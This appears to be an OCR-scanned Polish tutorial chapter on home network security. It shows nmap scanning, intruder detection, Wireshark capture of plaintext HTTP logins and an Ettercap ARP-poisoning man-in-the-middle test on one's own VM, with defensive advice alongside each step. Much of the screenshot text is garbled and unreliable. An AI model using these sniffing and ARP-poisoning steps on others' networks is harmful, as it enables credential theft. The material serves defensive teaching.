Skan, a po chwili w oknie Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 23:57 CET 
Nmap scan report for 192.168.43.1 


Komenda:  nmap -T4 -F 192.168.43.184/24 


poniżej pojawią się rezulta- pd DESKTC Host is up (0.06675 latency). 
41; kali(192 Not shown: 99 closed ports 
ty ©. Jeśli zostaną wykryte TE AAA 


jakiekolwiek urządzenia 
- zostaną automatycznie 
dodane do listy hostów 
znajdującej się w pane- 
lu po lewej stronie ©. 
Jeżeli chcemy poznać wię- 
cej szczegółów, wystarczy 


53/tcp open domain 
MAC Address; 28:FE:CD:05:4B:3B (Lemobile Information Technology| 


Nmap scan report for DESKTOP-6B5S7C0G (132.168.43.23) 

Host is up (0.80043s latency). 

Not shown: 99 filtered ports 

PORT STATE SERVICE 

5357/tcp open wsdapi 

MAC Address; 08:00:27:27:44:9F (Oracle VirtualBox virtual NIC) 


Nmap scan report for kali (192.168.43.184) 


Zenmap 


Skan Pomoc 


Narzędzia Profil 


Cel / 192.168.43.184/24 ”  Profik  Pingscan = Skan 


Komenda:  nmap -sn192.168.43.184/24] 


Usługi Wynik działania Nmapa Porty/Hosty Topologia Szczegóły hosta Skany 


nmap -sn192.168.43.184/24 1 Szczegóły 


ls 192.168.43.1 
DESKTOP-6B57COG (192. 


kali (192.168.43.184) 


Starting Nmap 7.86 ( https://nmap.org ) at 2626-61-67 23:45 CET 
Nmap scan report for 192.168.43.1 

Host is up (6.0155 latency). 

MAC Address: 28:FE:CD:05:48B:3B (Lemobile Information Technology 
(Beijing)) 

Nmap scan report for DESKTOP-6BS7C0G (192.168.43.23) 

Host is up (6.688185 latency). 

MAC Address: 08:00:27:27:44:9F (Oracle VirtualBox virtual NIC) 
Nmap scan report for kali (192.168.43.184) 

Host is up. 

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.25 seconds 
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Wynik działania Nmapa | Porty/lłosty Topologia Szczegółyhosta Skany 


62 


Przeglądarka hostów Promienie Sterowanie 


Legend Zapisz grafikę 


192.168.43.1 


localhost 


Qa 192.168.43.184) 


Z. kolei w zakładce Topologia © będziemy 
mogli zapoznać się z układem urządzeń 
w skanowanej sieci. 


Wiemy, że nasze urządzenie ma adres 

192.168.43.184 i ma przypisaną na- 
zwę hosta kali. Adres 192.168.43.1 to 
najpewniej adres bramy domyślnej route- 
ra, a host o nazwie DESKTOP to w naszym 
przypadku uruchomiona do testów ma- 
szyna wirtualna z systemem Windows 10. 
Już tak prosty skan pozwala na poznanie 
wielu szczegółów na temat sieci, w jakiej 
się znajdujemy. 


Gdybyśmy byli atakującym, moglibyśmy 

na tej podstawie określać urządzenia, 
które chcemy atakować i na przykład podsłu- 
chiwać. Wyszukanie informacji na temat ak- 
tywnych usług, serwerów, otwartych portów 
może umożliwić poznanie słabego punktu, 
który pozwoli na przejęcie kontroli nad wy- 
branym serwerem lub komputerem. 


Jak się bronić przed tego 
typu atakiem 

Obrona przed skanowaniem jest 
właściwie niemożliwa z pozio- 
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mu systemu Windows. Możemy natomiast 
wykryć intruza, który podłączy się do naszej 
sieci, i wtedy jak najszybciej zablokować mu 
do niej dostęp lub zmienić hasło. 


m Sprawdzamy, czy ktoś obcy nie korzy- 
sta z naszego Wi-Fi 

W tym celu wykorzystamy program Who ls 
On My WiFi (MIE). Dzięki niemu będziemy 
mogli w czasie rzeczywistym skanować na- 
szą sieć i na bieżąco będziemy widzieć, ja- 
kie urządzenia z niej korzystają. Po dodaniu 
zaufanych urządzeń będziemy mogli łatwo 
rozpoznać intruza. 


1 Po zainstalowaniu programu klikamy na 
Scan Now EJ w prawym górnym rogu 
okna. 


Następnie klikamy na opcję o nazwie 
Always Scan 


Who's On My WiFi 


Add Network to Scan List? 


This is the first time this network has been seen 
Do you want to automatically scan this network? 


adam1l3zajacigmail.com 


|B5 Who's On My WiFi 
File View  Anałytics Help About 


No Networks set to Autoscan 
Onine Service Not Connected 


zy [a] x 
Scan Now le) 


Otracked devices. 0 connected. 0 unknown connected 


Descrpbon Mac Address Last Computer Name Last IP Address Connected Known/Unknown Remove Description: 


[0] Onty Show Connected Save Changes 


MAC Address 
IP Address 
HostName: 

Manufacturer: 
Frst Seen 
Last Szen 

Dotal Sgnature: 
Known 
Connected 


Po chwili skanowanie zostanie zakoń- 

czone, a wszystkie znalezione urządze- 
nia znajdziemy w głównym oknie progra- 
mu ©. Wystarczy teraz zweryfikować adre- 
sy IP naszych urządzeń i zmienić ich status 
z Unknown na Known. 


Program będzie działał w tle i wykony- 

wał skanowania co 5 minut. Jeśli znajdzie 
jakieś nowe urządzenie, które zostanie podłą: 
czone do naszej sieci - czyli - potencjalnego 
intruza, dostaniemy odpowiednie powiado- 
mienie. Będziemy wtedy musieli jak najszyb- 
ciej zmienić hasło dostępu do naszej sieci. 


UWAGA! 


Jeżeli korzystamy z darmowego punktu 
dostępowego, na przykład w restauracji 
czy na lotnisku, nie możemy zablokować 
prób skanowania i jesteśmy podatni na 
różnego rodzaju ataki. 

Na końcu tego rozdziału znajdziemy 
informacje, jakie dodatkowe kroki 
możemy podjąć w systemie Windows 
w celu ochrony swoich danych w sie- 
ciach otwartych. 


Range: 192.168.1.1-254 
Service Not Connected 


tracked devices, 7 connected, 7 unknown connected 


Connected  Known/linknown Remove 
UNKNOWN = 


UNKNOWN 


UNKNOWI 


: 
> 


v 
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Podsłuchiwanie komunikacji sieciowej 


74 ałóżmy, że nie skanujemy aktywnie 
naszej sieci w poszukiwaniu intruzów 
lub korzystamy z otwartego punktu dostę- 
powego - nasze pakiety sieciowe mogą być 
przechwytywane przez inne osoby i anali- 
zowane. Właściwie nie tylko nasze pakiety, 
ale nawet cała komunikacja sieciowa wszyst: 
kich urządzeń w danej sieci lokalnej. 

W zależności od tego, jaki cel chce osiągnąć 
atakujący, może skorzystać z różnego rodzaju 
programów. Jeśli jego celem jest podsłuchi- 
wanie i późniejsza analiza wszystkich pakie- 
tów, może skorzystać z programu Wireshark, 
który można zainstalować nawet w systemie 
Windows. Jeżeli chce poznać jedynie hasła 
oraz loginy, może skorzystać z programu Et- 
tercap. Możliwości i specjalistycznych pro- 
gramów jest znacznie więcej. W tym rozdzia- 
le poznamy te dwa programy i odpowiednie 
metody ochrony i rozpoznawania ataków na 
naszą komunikację sieciową. 


Wireshark - kombajn 

do przechwytywania pakietów 
Jednym z najlepszych programów do prze- 
chwytywania i analizowania ruchu siecio- 
wego jest Wireshark. Jest to program dostęp- 
ny na systemach Linux, Windows, a nawet 
Mac OS. Korzystają z niego zarówno osoby 
prywatne, jak i różnego rodzaju firmy. Nie 
służy on bowiem jedynie do wyszukiwania 
haseł w pakietach sieciowych. Może być też 
skutecznym narzędziem diagnostycznym. 
Pozwala wykryć uszkodzone pakiety siecio- 
we, błędy komunikacyjne, ataki DDoS i inne 


różnego rodzaju anomalie, pomagając w ten 

sposób w przywróceniu poprawnej pracy 

sieci. My skupimy się na tym, jakie informa- 

cje może wychwycić atakujący posługujący 

sie tym programem. 

Dodatkowo przy podsłuchiwaniu ru- 

chu w celu zwiększenia skuteczności są 

stosowane ataki: 

m Zatruwania tablic ARP (ARP Poisoning), 

m MITM (Man in the Middle) - atak z użyciem 
pośrednika, 

m zatruwanie DNS. 


Podstawowa obsługa programu 
Wireshark jest bardzo skomplikowanym pro- 
gramem, który może służyć do bardzo wielu 
zadań. Poznajmy jego podstawową obsługę 
oraz zobaczmy, w pewnym przybliżeniu, jak 
wygląda przechwytywanie ruchu sieciowego 
i jego późniejsza analiza. 


Uruchamiamy program, wpisując w Ter- 
minalu polecenie sudo wireshark 


krzysiekEkali:-$ sudo wireshark 
[sudo] hasło użytkownika krzysiek: 


Pojawia się główne okno programu - za- 

nim zaczniemy, musimy wybrać interfejs, 
którego chcemy użyć do przechwytywania 
pakietów. Wybieramy ten, z którego korzy- 
stamy do połączenia się z siecią - w naszym 
przykładzie jest to wlani © - i klikamy na 
górnym pasku na ikonę z niebieską płetwą 
(Uruchomienie przechwytywania pakietów). 


Plik Edytuj Widok ldź Przechwytuj Analizuj Statystyki Telefonia Bezprzewodowe Narzędzia Pomoc 


Au 


© 


GQ 


taj w Wireshark 


Przechwytywanie 


„używając tego filtru: (F [w 


Loopback: lo 
any 

wiano 

etho 

nflog 


= 


EJ -| wyrażenie + 


* | Wszystkie interfejsy * 
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Przechwytywanie z włani 


Telefonia Bezprzewodowe Narzędzia Pomoc 


aąq4qi 


Plik Edytuj widok Idź Przechwytuj Analizuj Statystyki 
c ę = 
ful © | "w p Y || = 


0 -| wyrażenie. 


Source Destination engtt info 


Po chwili cały ruch sieciowy generowany Ter szaDony RAIBOJ ZBIZZSTJUI | 
A A ; s EB VirtualBox VM= Katalog — 07.01.2...0 19:48 
na podanym interfejsie oraz komunikacja PF wióeo katalog _28,12.2...9 13:04 , 
z innymi urządzeniami w sieci zacznie być mne Kogaci | (lgochowaj 
rejestrowana i zapisywana automatycznie. X Anuluj 
Możemy zatrzymać przechwytywanie pa- | 27Pzbko: Wireshań.- pczprą * || $gpomoc 
kietów, klikając na górnym pasku na symbol kompresuj używając gzip 


czerwonego kwadratu 

Wszystkie pakiety przechwycone w ko- 

munikacji znajdziemy w głównej części 
okna ©, są one podzielone na różne kolumny. 
Poniżej głównego okna znajdziemy szczegóły 
dotyczące konkretnego pakietu odpowiednio 
sformatowane, w oknie na samym dole znaj- 
duje się surowy zapis RAW danych pakietu, 
który początkującym użytkownikom przyda 
się najmniej. 


dej aa e Idż Przechwytuj A 
analizować ruch, 
który przechwyciliśmy |= fa x (a 
od razu, lub zapisać go 

do pliku w celu późniejszej analizy. Klikamy 
na górnym pasku na ikonę białej karty ©. Po- 
dajemy nazwę pliku końcowego i zapisujemy 
dane, klikając na Zachowaj 


*wlan1 - 
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4mMdGmEORE GauwER  EQQQF 
(A|Eastosuj filtr wyświet t _ ZZ A ASD z ___ E0-| wyrżenie.. + 
No. Time Source Destination Protocol Lengtł Info —E 


192.168.1.111 
185.63.144.5 


21698 295.76927428G 185.63.144.5 TLSv1.2 


21699 295.769313601 192.168.1.111 


97 Encrypted Alert 
66 41606 - 443 [ACK] $eq=1999 Ack=4580 win=64128 LC 


66 41606 — 443 [ACK] $eq"2000 Ack-4581 Win-64128 Le 
66 443 — 41606 [ACK] Seq=4581 Ack=2006 w1n=49152 LJ] 


21702 295.769710115 192.168.1.111 185.63.144.5 
21703 295.815369881 185.63.144.5 192.168.1.111 1cp 


21704 295.819483303 192.168.1.111 216.58.215.78 uoDP 65 49813 - 443 Len=23 
21705 295.826049508 216.58.215.78 192.168.1.111 ADwin 64 |zj 
21706 296.503625982 192.168.1.111 172.217.20.163 UDP 130 38412 - 443 Len=88 
1707 296.527843332 172.21/.20.163 192.168.1.111 OP 81 8412 Len-139 
08 296.5283/3583 . -20. 92.168.1.111 UDP 0 443 — 38412 Len=18 
21709 296.528523670 192.168.1.111 172.217.20.163 UDP 70 38412 - 443 Len=28 
21710 296.540595314 54.192.231.81 192.168.1.111 TLSv1.2 112 Application Data ==] 


> Frame 217/07: 181 bytes on wire (1448 bits), 181 bytes captured (1448 bits) on interface O 

+ Ethernet II, $rc: Dasan 00:00:05 (00:40:cb:00:00:05), Dst: Tp-LinkT Ob:cc:b4 (18:46:c7:0b:cc:bd) 
» Internet Protocol Version 4, $rc: 172.217.28.163, Dst: 192.168.1.111 

+ User Datagram Protocol, Śrc Port: 443, Dst Port: 38412 

> Data (139 bytes) 


1 d6 c7 6h ce b4 60 dó ch 66 GQ 65 64 GQ 45 GQ E 
00 a7 00 00 40 00 3a 11 bc b2 ac d9 14 a3 cO a8 ©: 

91 6r 01 bb 96 Gc 00 93 51 6e 40 34 73 bl 2997 0 Qnęds ) 
3c 83 3b cf 4a ff 69 95 a6 48 89 4c bb ca 1d 34 <;J1 HN 4 
55 d4 78 af 97 Ge 2c dB 33 02 33 55 49 df 61 d8 U'x''n,  3-3UI 
35 ac 64 cc fc 71 3d a6 a8 67 ba a1 97 ac d5f5 5d q= 

Se 8c ab ic 62 e8 73 4a aa bd 35 72 ef 7083 77 4 <b'sJ  Sr-p 
45 95 9c hh 61 aQ 76 dr 5a 96 6 28 98 he JAGh E av Zof *k 
7e 26 b4 6a 54 Od 7e 4” 54 ©e 41 97 3b c2 90ff 4 T-OTA; 
65 ec 7e 24 62 la 52 9a b9 88 37 79 ic f8 di Ge e'-$b'R 2 

36 4e a6 73 bd d3 2b cb C8 b6 50 7b aS da 4c 35 6N5 + P( LS 


05 92 Je 22 Ob 


© 7. wireshark_wlan1_20200...8144856_8OBivx.pcapn 


Pakietów: 21719 - Wyświetlanych: 21719 (100.0%) - Porzuconych: 0 (0.0%) 


Profil: Default 
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x nĘ Zaloguj się - Kontow ks 


© konto.komputerswiat.pl/zuth htmi?6t3te-%2Fkcntoś.app_id= kspl 


Połączenie jest bezpieczne 
Informacje, które wysyłasz tej witrynie (na 
przykład hasła lub numery kart 
kredytowych!, pozostają prywatne. Więce 


nfarmacji Loqow 


IB Certyfikat (Ważny) 


© Pliki cookie (w użyciu: 48)) 


© Ustawienia witryn 


| Qin | 
Logowanie ze strony korzystającej z protokołu HTTPS 


Na górnym pasku jest bardzo ważne 

pole tekstowe, które służy do filtrowa- 
nia. Dzięki niemu będziemy mogli wyszukać 
jedynie te pakiety, które nas interesują. Jest 
to jedna z najważniejszych funkcji progra- 
mu Wireshark. Możemy na przykład w kilka 
sekund znaleźć pakiet logowania na stronie 
internetowej wśród tysięcy innych pakietów. 


W celu sprawdzenia, jak wyglądają pa- 

kiety generowane przy próbie logowania 
w witrynie, która korzysta z HTTPS, w polu 
filtrów należy wpisać ip.addr == [adres IP] 
86 ssl ©. Z tak zaszyfrowanych pakietów 
atakujący absolutnie nic nie odczyta - może 
jedynie sprawdzić adres serwera, z którym 
się łączymy, i domyślić się, że na przykład 
wyszukiwaliśmy coś na konkretnej stronie. 


Plik Edytuj widok idź Przechwytuj Analizuj Statystyki Telefonia 


p GLI 


'= 192.168. | 


'Qm0BE LE*EFŁ= 


A Niezabezpieczona) testphp.vulrweb.com/login.php 


cuart 


iunetix Web Vulnerability S 


Twoje połączenie z tą witryną nie 
jest bezpieczne 

Nie podawaj żadnych informacji poufnych 
(takich jak hasła czy dane kart 
kredytowych) w tej witrynie, bo osoby 


atakujące będą mogły je wykraść. Więcej 


informacji 


sclaimer yourcart g 


© Pliki cookie (lw uży 


iu: 01) 


e already registered pleaś 


©: Ustawienia witryn 


k categories Username : [testowy 


artists 


Ę 


Password : 


Logowanie ze strony korzystającej z protokołu 
HTTP. Nowe przeglądarki automatycznie informują 
0 tym, gdy korzystamy z niebezpiecznego protokołu, 
zaznaczając taką stronę jako Niezabezpieczona. 


Dla porównania sprawdźmy, jak to wy- 

gląda w przypadku próby zalogowania 
w portalu korzystającym ze zwykłego HTTP. 
Uruchamiamy ponownie przechwytywanie 
pakietów, klikamy na Kontynuuj bez zapisy- 
wania w programie Wireshark, wykonujemy 
próbę zalogowania na dowolnym niezabez- 
pieczonym portalu i po chwili zatrzymuje- 
my przechwytywanie pakietów. Tym razem 
w polu filtrowania wpisujemy filtr ip.addr 
== [adres IP] 88: http 71 i filtrujemy. 


Bezprzewodowe Narzędzia Pomoc 


aqQąF 


23 "| wyrażenie... 


Destination 
192.168.1.111 
184.87.172.152 


ce 
-185.216.18 
92.168.1.111 
j4.87.172.152 


Time 
9774 58.189593007 
9781 58.21190546Q 
9788 58.221384631 
9792 58.221868925 
9794 58.225723920 
9795 58.225905808 
9797 58.230585072 
9799 58.230620181 
9801 58.232371150 


192.168.1.111 
192.168.1.111 
184.87.172.152 
104.87.172.152 
192.168.1.111 
192.168.1.111 
192.168.1.111 


104.87.172.152 
104.87.172.152 


9822 58.492904534 192.168.1.111 
9823 58.498944622 93.184.220.178 
9833 54.500501473 93.184.2208.178 


192.168.1.111 
93.184.220.178 
192.168.1.111 
192.168.1.111 


frame 9818: 583 bytes on wire (4664 bits), 583 bytes captured 
Ethernet II, $rc: Tp-LinkT ©b:cc:b4 (18:46:c7:0b:cc:b4), Dst: 


Protocoł Lengtt Info 
-3 1416 Application Data, Application Data 
3 583 Client Hello 
„3 1514 Server Hello, Change Cipher Spec, Application De 
-3 1125 Application Data, Application Data, Application 
Ś 146 Change Cipher Spec, Application Data 
568 Application Data 
353 Application Data 
353 Application Data 
321 Application Data 


3 
3 
-3 
3 
3 


3 165 Hello Retry Request, Change Cipher S 

.3 589 Change Cipher Spec, Client Hello 

-3 1514 Server Hello, Application Data 

3 612 Application Data, Application Data, Application 
, 

(4664 bits) on interface Q 

Dasan_ 00:00:05 (00:10:cb:00:00:05) 


Internet Protocol Version 4, Src: 192.168.1.111, Dst: 93.184.220.178 


Transmission Control Protocol, Src Port: 58918, Dst Port: 443, 
Transport Layer Securit 


Content Type: Handshake ( 
Version: TLS 1.0 (0x0301) 
lannth- 517 


Seq: 1, Ack: 1, Len: 517 
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*wlan1 = TE 
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duc©m1RYRE+EFŁ_EQAAAF 
[A £3 *| wyrażenie + 


No. 


IL... PARSE Destination 


+ Internet Protocol Version 4, Śrc: 192.168.1.111, Dst: 13 
+ Transmission Control Protocol, $rc Port: 39638, Dst Port: 80, Seq: 


icp _php?mode=login 
l(c041d6b16ae(6180685346afe0) 


Protocol _Lengtt info 


136 26.1/8513149 36.243.132.21 192.168.1. p 8 P/1.1 286 OK 

138 26.284780458 192.168.1.111 „243.132 HTTP 645 GET /styles/MyInvision/tneme/pl/styleshect .css?assets_q 
153 26.383384974 136.243.132.217 192.168.1.111 HTTP 71 HTTP/1.1 404 Not Found (text/html) 

184 26./81275695 192.168.1.111 136.243.63.184 HIP 174 GET /socialize/login/fTrane/?0akk-9244940akv-38bb5e57329 
187 26.775129958 136.243.63.184 192.168.1.111 HTTP 1384 HTTP/1.1 288 OK (text/html) 

199 26.864397777 192.168.1.111 151.101.1.166 HTTP 110 GET /css/api/themes/beveled w35 h35 wc vi.css HTTP/1.1 
203 26.892453998 151.101.1.166 192.168.1.111 HTTP 384 HTTP/1.1 384 Not Modified 


» Ethernet II, Src: Tp-LinkT_Ob:cc:b4 (18:d6:c7:8b:cc:b4), Dst: Dasan_00:00:05 (00:d0:cb:80:00:05) 
36.243.132.217 


EMI) 


1, Ack: 1, Len: 994 


Tym razem jesteśmy w stanie bez żad- 
nych problemów odczytać całą komu- 
nikację sieciową w jawnym tekście. Z wyfil- 
trowanej listy pakietów wybieramy pakiet 
z metodą POST w kolumnie Info. 


10 Następnie w oknie szczegółowych in- 
formacji o pakiecie rozwijamy katego- 
rię HTML Form URL. Tutaj jak na dłoni można 
zobaczyć informacje, jakie wprowadziliśmy 
przy próbie zalogowania się 


Jak zabezpieczyć się 
przed tego typu atakiem? 
Uwaga! Niezwykle ważne jest, 
abyśmy korzystali ze stron, które 


domyślnie zapewniają szyfrowanie HTTPS, po- 
nieważ każde logowanie na stronie typu HTTP 
jest bardzo proste do przechwycenia - zwłasz- 
cza w sieciach otwartych, gdzie nie wiemy, czy 
nie jesteśmy inwigilowani. 
Dobrym pomysłem jest używa- 
nie dodatku do przeglądarek 
HTTPS Everywhere ©, którego 
zadaniem jest wymuszanie na 
każdej stronie, która to umożliwia, komuni- 
kacji z wykorzystaniem protokołu HTTPS. 
Można go dodać do wielu popularnych 
przeglądarek. 

Na kolejnych stronach poznamy jeszcze bar- 
dziej kompleksowe metody ochrony przed 
podsłuchiwaniem w sieci. 


e. 
example.com 


a https:// 


http:// 


|a| E https://example.com 


Działanie dodatku HTTPS Everywhere. Jak widać, po wymuszeniu korzystania z protokołu HTTPS dane 


na stronach są zabezpieczone i atakujący nie może ich odczytać. W przypadku stron z HTTP nasze dane 
można łatwo odczytać - są przesyłane jawnym tekstem 
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Zbieranie pakietów z całej sieci 


o tej pory sprawdzaliśmy ruch sieciowy, 

który wychodził i przychodził tylko do 
naszego komputera, by poznać podstawy 
działania programu Wireshark. Korzystali- 
śmy w tym celu z filtrów do wybierania tylko 
pakietów, które dotyczyły konkretnego adre- 
su IP. Domyślnie Wireshark działa w trybie 
aktywnego zbierania wszystkich pakietów 
sieciowych. Osoba, która będzie chciała prze- 
chwycić nasz ruch sieciowy, będzie pobierała 
ruch z całej sieci. Korzystając ze skanerów, 
wykryje, jaki jest nasz adres IP w wewnętrz- 
nej sieci i będzie mogła śledzić nasze pakiety. 
Jeśli chcemy sprawdzić, jaki tryb zbierania 
pakietów jest aktywny, klikamy na górnym 
pasku na Przechwytuj, Opcje 


jalizuj Statystyki Telefonia Bezprzewodowe 


jog 


Cwi+E 


Filtry przechwytywania. 
1 Odśwież interfejsy 
192.168.1,111 
136.743.63.184 
192.168.1.111 
151.101.1,166 


199 26.864397717 
203 26.892453098 


192.168.1.111 
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Jeśli zaznaczony jest tryb Mieszany El, zbie- 
rane są wszystkie pakiety. 

W angielskiej wersji możemy spotkać się z na- 
zwą Promiscuous Mode. 


Atak Man in the Middle 

Zacznijmy więc od pierwszego elementu - 
ataku Man in the Middle (MITM). 

Bez przekierowania całego ruchu z naszego 
komputera atakujący nie ma pewności, czy 
pojedyncze pakiety nie są gubione, a dodatko- 
wo tylko przy przekierowaniu całego ruchu 
atakujący, podszywając się pod punkt dostę- 
pu, może również zmieniać pakiety przesy- 
łane bezpośrednio do niego. 

W celu sprawdzenia, jak w praktyce wygląda 
taki atak, możemy wykonać testy bezpieczeń- 
stwa na naszej sieci, korzystając z programu 
Ettercap, który możemy obsługiwać poprzez 
interfejs graficzny. To złożony pakiet wielu na- 
rzędzi, który po prostej konfiguracji pozwoli 
na przeprowadzenie symulacji ataku MITM. 
Jeśli chcemy sprawdzić, jak dokładnie prze- 
biega taki atak, możemy skorzystać z dodat- 


Wireshark - Interfejsy przecnwytywania 


Wejście | Wyjście Opcje 
Interfejs Ruch Nagłówek warstwy łącza 
> Loopback: lo —_ Ethernet 
any = Linux cooked v1 
wlano e Ethernet 
eth0 — Ethernet 
nflog za Linux netfilter log messag 
nfqueue —_ Raw IPv4 
bluetoothO = Bluetooth HCI UART trans 
Cisco remote capture: ciscodump = Unknown 
DisplayPort AUX channel monitor capture: dpauxmon __ Unknown 
Random packet generator: randpkt a Unknown 
systemd Journal Export: sdjournal = Unknown 
SSH remote capture: sshdump —_ Unknown 
UDP Listener remote capture: udpdump Unknown 


[.V (v| Włącz tryb mieszany dla wszystkich interfejsów 


Filtr przechwytywania dla wybranych interfejsów: | | w 
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kowego komputera w naszej sieci lub smart- 
fona, który będzie się łączył z naszą siecią. 
Osoby, które wcześniej utworzyły maszynę 
wirtualną z systemem Windows 10, mogą 
skorzystać z niej do emulacji dodatkowego 
komputera w sieci. 


W Terminalu wpisujemy polecenie sudo 
ettercap -G 


SZ sudo ettercap -G 


sudo] hasło użytkownika krzysiek: 


Następnie od razu po uruchomieniu 

wybieramy interfejs, zaznaczamy opcję 
Sniffing at startup i klikamy na symbol po- 
twierdzenia na górnej belce 4 


Ettercap 


02 H «a 0 54 


Setup 


Sniffing at stortup GO 


Primary interface — wdant z 


RH 
LL 


L 


Bridged śniffing 


Bridged Interface 


Rozpocznie się nasłuch całej sieci lokal- 
nej. O tym, że jest aktywny, możemy 
dowiedzieć się, patrząc na górny lewy róg 
okna. Przy aktywnym skanowaniu będzie 
tam ikona zatrzymania 


Potem musimy przeskanować sieć w po- 
szukiwaniu podłączonych urządzeń, aby 
wskazać jedno konkretne, na którym chcemy 


przeprowadzić testy. Kl- m a 65 
kamy na górnym pasku na n 
symbol lupy ©- 


Po chwili w dolnym oknie programu 
pojawi się informacja, ile hostów zostało 
wykrytych w naszej sieci 


ctte 


mega wrycrYry 
pz known services 

tarting Unifled sniffing... 
andomizing 255 hosts for scanninq... 


canning the whole netmask for 255 hosts... 
hosts added lo the hosts list... 


| Q GG 


Ettercap 
| 8.3 (EB 


Host List 
| IP Addr 
192.168.1.100 00:D0:CB:00:00:05 
192.168.1.101 50:EC:50:13:20:FA 
192.168.1.103 AC:84:C6:3F:9E:5C 
192.168.1.105 28:FF:CD:05:4B:3B 
192.168.1.106 00:D8:61:C3:8E:1A 
192.168.1.108 A4:34:D9:50:E6:1E 
192.168.1.112 08:00:27:27:44:9F 
192.168.1.150 60:45:CB:12:3B:18 


Delete Host Add to Target 1 


Teraz możemy przejść do widoku znale- 
zionych hostów - klikamy na ikonę © po 


"GE "TĘ =TGTTEEM prawej stronie lupy (ikony 
skanowania). Na liście 
będą wszystkie hosty - nas 
interesuje jeden konkretny 
z maszyny wirtualnej lub 
innego komputera, który 

E i p | A ca | p kontrolujemy. 
| = wd 
W systemie Windows 10 
lettęocoo w celu sprawdzenia ad- 
spot aięcje dozy resu IP klikamy prawym 
e Że przyciskiem myszy na Po- 
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e| © Ustawienia 


m Sieć 4 


Właściwości 


Adres IPv6 połączenia lokalnego: 
Adres IPv4: 
Serwery DNS IPvd: 


Sufiks podstawowej domeny DNS: ocal 
Producent: Inte 
Opis: 


Wersja sterownika; 
Adres fizyczny (MAC): 


km 


Masz pytanie? 


Uzyskaj pomoc 


łączenia sieciowe, Zmień właściwości połą- 
czenia - po przewinięciu widoku będziemy 
mogli poznać szczegóły naszego połączenia, 
między innymi adres IP 


Teraz w oknie Ettercap wybieramy ad- 
res naszego testowego systemu i klikamy 


na Add to Target 1 


192.168.1.112 08:00:2 
192.168.1.150 60:45:CB:12:3B:18 


Delete Host 


TER PETPTTKOTETTYYE 


Add to Target 1 


1921681112 


TOTEN -T 
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Następnie otwie- 
ramy menu MITM 
na ARP poi- 


i klikamy [© ARP poisoning... 
soning... ©. ICMP redirect. 
W kolejnym 


Port stealinq... 
1 oknie zaznacza- 


my opcję Sniff remote connections 
kamy na OK. 


DHCP spoofing... 


i kli- 


Cancel MITM Attack: ARP Poisoning OK 


Optional parameters 
Sniff remote conneclions 


Only poison one-way. 


1 Teraz przechodzimy do drugiej ma- 

szyny i logujemy się na niezabezpie- 
czonej witrynie korzystającej z HTTP. Od 
razu po kliknięciu na przycisk logowania 
w programie Ettet- 


cap pojawią się dane © © : 
logowania oraz stro- 
na internetowa MITM 
ARP poisoning... 
1 Zatrzymuje- ICMP redirect... 
my testowy Port stealinq... 

atak, klikając na Stop DHCP spoofing... 
MITM attack(8) — Stop MITM attack(s) 
Opisany przykład 

AR SSL Intercept 
całkowicie wystarczy 


x [6 wege 


t WE NECEĘ wrARK ENY AJ PP a * 


4 g%iBOW  AAX Uere 


row re tr eacy rozlaryc płetto om aa za wiceadm Lea 


Tow can alko Um tre 
Sarwo Grsteć. Plosze sze We wazrrewre tegł wi DR ceszwocd wal 
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ATAK MAN IN THE MIDDLE (MITM) 


© — 


ii 


Połączenie 
oryginalne 


>> 


Atak 


Ofiara ; 
Main in the Middle 


Haker 


do zrozumienia zasady działania ataku typu 
MITM, który nie ogranicza się do zatruwa- 
nia ARP. Po przekierowaniu całego ruchu na 
swoje urządzenie atakujący może próbować 
zmusić nas na przykład do korzystania z wer- 
sji HTTP znanych witryn zamiast bezpiecz- 
nego HTTPS lub też modyfikować pakiety 
sieciowe. 


Czy protokół HTTPS zawsze 
zapewnia nam bezpieczeństwo? 
Niestety, atakujący znaleźli kilka słabości 
nawet w komunikacji sieciowej z wykorzy- 
staniem protokołu HTTPS, które pozwalają 
na przechwytywanie i deszyfrowanie teore- 
tycznie bezpiecznych pakietów sieciowych. 
Istnieją metody na „rozebranie” pakietu 
z szyfrowania - wykorzystywana jest przy 
tym metoda SSLstrip („rozbieranie SSL”). 
Pozwala to na przejęcie i odczytanie całej ko- 
munikacji, przez podszywanie się pod punkt 
dostępu. Poznamy teraz teoretyczne metody 
tego typu ataków, a następnie dowiemy się, 
jak skutecznie się zabezpieczyć. 

Opisany powyżej atak składa się z kilku 
etapów. Najpierw komunikacja z naszego 
komputera zamiast trafiać do routera jest 
kierowana do urządzenia osoby atakującej. 
Następnie atakujący deszyfruje nasz pakiet, 
a potem szyfruje go ponownie i wysyła 
poprawny pakiet do routera. Następuje ko- 


Serwer 
Strona WWW 


Ruch sieciowy ofiary zamiast 
przechodzić przez router i trafić 

do internetu jest przechwyty- 
wany przez atakującego, który 
wymusza kierowanie go przez 
swoje urządzenie, a dopiero potem 
przesyła pakiety dalej. W ten 
sposób śledzi i podsłuchuje ofiarę 


munikacja z serwerem, a odpowiedź trafia 
dokładnie tą samą drogą ponownie przez 
urządzenie atakującego. 


Zatruwanie ARP 

ARP, inaczej ARP Poisoning, jest to forma 
ataku polegająca na modyfikacji tablicy ARP. 
W dużym skrócie każdy komputer w sieci 
ma taką tablicę, w której na bieżąco mapu- 
je logiczne adresy na adresy fizyczne, czyli 
można powiedzieć, że służy do kojarzenia 
adresów IP z adresami MAC. Oczywiście nie 
służy jedynie do tego. Domyślnie w całej sie- 
ci działa dynamiczna wersja tego protokołu. 
Dzięki temu za każdym razem, gdy do sieci 
podłączane jest nowe urządzenie, przesyłane 
są pakiety ARP do wszystkich innych urzą- 
dzeń, które mogą przypisać sobie w swojej 
tablicy, że w sieci pojawiło się jakieś nowe 
urządzenie. Od tego przypisania dane urzą- 
dzenie może na długo pozostać w pamięci 
i jeśli często pojawia się w danej sieci, będzie 
miało przypisany ten sam adres IP, ponieważ 
router będzie miał zakodowane, jaki adres IP 
został przypisany do fizycznej karty siecio- 
wej, a raczej jej adresu MAC. 

Załóżmy, że router ma adres IP - 1.1.1.1, ma- 
szyna testowa - 2.2.2.2, a atakujący 3.3.3.3. 
Modyfikacja takiej tablicy następuje w wy- 
niku wysłania sztucznie spreparowanego 
pakietu ARP. Router oraz maszyna mają od- 
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powiednie wpisy i rozpoznają 
się w sieci. W sieci pojawia się 
atakujący i automatycznie inne 
urządzenia dodają sobie wpis do 
swoich tablic na jego temat. Ata- 
kujący jednak tworzy sztuczne 
pakiety ARP, którymi zasypuje 
router oraz maszynę testową. 
